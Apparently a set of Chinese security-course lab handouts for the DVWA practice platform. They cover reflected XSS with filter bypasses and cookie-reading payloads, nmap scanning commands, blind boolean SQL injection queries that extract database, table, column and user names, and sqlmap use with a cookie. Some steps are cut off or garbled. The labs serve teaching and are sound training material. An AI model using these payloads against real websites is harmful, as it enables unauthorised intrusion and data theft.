当前位置:文档之家› 数据库应用与安全管理实训3

数据库应用与安全管理实训3

实训反射型XSS 1一、实训目的1. 了解XSS不同类型的异同2. 掌握反射型XSS的利用二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Low。

2. 反射型XSS漏洞挖掘(1)点击XSS(Reflected),进入测试页面。

(2)在URL地址框中输入<script>alert(/xss/)</script>,出现弹框。

(3)在URL地址框中输入<script>alert(document.cookie)</script>,出现弹框,获得当前页面的cookie。

3. 将操作过程截图,整理文档后上传平台。

实训反射型XSS 2一、实训目的1. 了解XSS不同类型的异同2. 掌握反射型XSS的利用二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Medium。

2. 反射型XSS漏洞挖掘(1)点击XSS(Reflected),进入测试页面。

(2)在URL地址框中输入<script>alert(/xss/)</script>,没有弹框。

(3)选择“View Source”查看源程序,发现服务器端使用str_replace()函数对“<script>”进行了替换,直接插入代码失效。

(4)双写绕过。

在”<script>”中在插入”<script>”的方式,实现绕过,具体格式如下:< sc<script>ript >添加弹框。

获得cookie。

(5)大小写混淆绕过。

将”<script>”进行大小写的变换,绕过str_replace()函数的检测。

具体格式如下:< S cri P t >添加弹框。

获得cookie。

3. 将操作过程截图,整理文档后上传平台。

实训反射型XSS 3一、实训目的1. 了解XSS不同类型的异同2. 掌握反射型XSS的利用二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为High。

2. 反射型XSS漏洞挖掘(1)点击XSS(Reflected),进入测试页面。

(2)选择“View Source”查看源程序,发现对“/<script>”进行了替换,不能使用常用的绕过方法。

(3)使用标签,如<img>、<body>等提供的方法进行脚本的注入。

<img> 标签弹窗:<img> 标签获取cookie:<body> 标签弹窗:<body> 标签获取cookie:3. 将操作过程截图,整理文档后上传平台。

主动扫描一、实验内容主动扫描。

二、实验环境BackTrack /Kali Linux。

三、实验操作步骤单个主机扫描:nmap ip单个主机在线状态扫描:nmap –sn ip多个不连续主机扫描:nmap ip1 ip2 ip3多个连续主机扫描:nmap ip地址的范围整个子网扫描:nmap ip地址/掩码位数1、主机发现。

跳过ping扫描阶段:nmap –PN ip仅使用ping协议进行主机发现:nmap –sP ip使用ARP协议进行主机发现:nmap –PR ip使用TCP协议进行主机发现:半开扫描:nmap –sS ip全开扫描:nmap –sT ip 使用UDP协议进行主机发现:nmap -sU ip2、端口发现。

扫描全部端口:nmap –p “*”ip扫描前n个端口:nmap --top-port n ip扫描指定端口:nmap –p 端口号ip3、扫描目标操作系统:nmap –O ip4、扫描目标服务:nmap –sV ip5、扫描结果保存:nmap –oX Report.xml ip四、应用拓展1、主动扫描工具的实例使用。

实训SQL注入(布尔盲注)1一、实训目的1. 了解SQL注入的常用方式2. 掌握SQL布尔盲注的方法二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Low。

2. 测试SQL注入点(1)点击SQL Injection(Blind),进入测试页面。

(2)使用参数1' and 1=1 #进行提交,页面显示存在。

使用参数1' and 1=2 #进行提交,页面显示不存在(3)猜解数据库名的长度。

具体命令如下:•1' and length(database())=1 # //显示不存在•1' and length(database())=2 # //显示不存在•1' and length(database())=3 # //显示不存在•1' and length(database())=4 # //显示存在(4)二分法猜解数据库名。

具体命令如下:•1' and ascii(substr(database(),1,1))<100 # //显示不存在•1' and ascii(substr(database(),1,1))>100 # //显示不存在修改substr函数的第二个参数,如substr(database(),2,1)进行测试,可以获得数据库的第二个字母。

(5)猜解数据库表的数量。

具体命令如下:•1' and (select count(table_name) from information_schema.tables wheretable_schema=database())=1 # //显示不存在•1' and (select count(table_name) from information_schema.tables wheretable_schema=database())=2 # //显示存在(6)猜解数据库表名的长度。

具体命令格式如下:•1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=1 # //显示不存在•…•1' and length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=9 # //显示存在(7)猜解数据库表的名称。

具体命令格式如下:information_schema.tables where table_schema=database()limit 0,1),1,1))<103 # //显示不存在•1' and ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))>103 # //显示不存在重复上述步骤,猜解出两个表名。

(8)猜解数据库表中的字段长度。

具体命令格式如下:•1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1# //显示不存在•…•1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8# //显示存在(9)猜解数据库表中的字段名称。

具体命令格式如下:•1' and ascii(substr((select column_name from information_schema.columns where table_name= 'users'limit 0,1),1,1))>117 # //显示不存在information_schema.columns where table_name= 'users'limit 0,1),1,1))<117 # //显示不存在(10)猜解表中的数据。

具体命令格式如下:•1' and (select count(first_name) from users)=5 # //显示存在users表中的字段数为5。

猜测每条记录的长度。

说明first_name的第一个值得长度为5个字符。

•1' and length(substr((select first_name from users limit 0,1),1))=5 # //显示存在(11)二分法猜解表中的数据。

具体命令格式如下:•1' and ascii(substr((select first_name from users limit 0,1),1,1))>97 # //显示不存在•1' and ascii(substr((select first_name from users limit 0,1),1,1))<97 # //显示不存在3. 将操作过程截图,整理文档后上传平台。

实训SQL注入(SQLMAP)一、实训目的1. 了解SQL注入的常用方式2. 掌握SQL工具注入的方法二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)3. SQLMAP工具三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Low。

2. 测试SQL注入点(1)点击SQL Injection,进入测试页面。

(2)在kali中调用sqlmap工具,使用命令“sqlmap –u 目标地址”进行测试,系统直接跳转到登陆页面。

(3)通过检查浏览器元素,在请求头中,查找到当前浏览器的cookie值。

(4)添加--cookie参数,完成SQL注入测试。

相关主题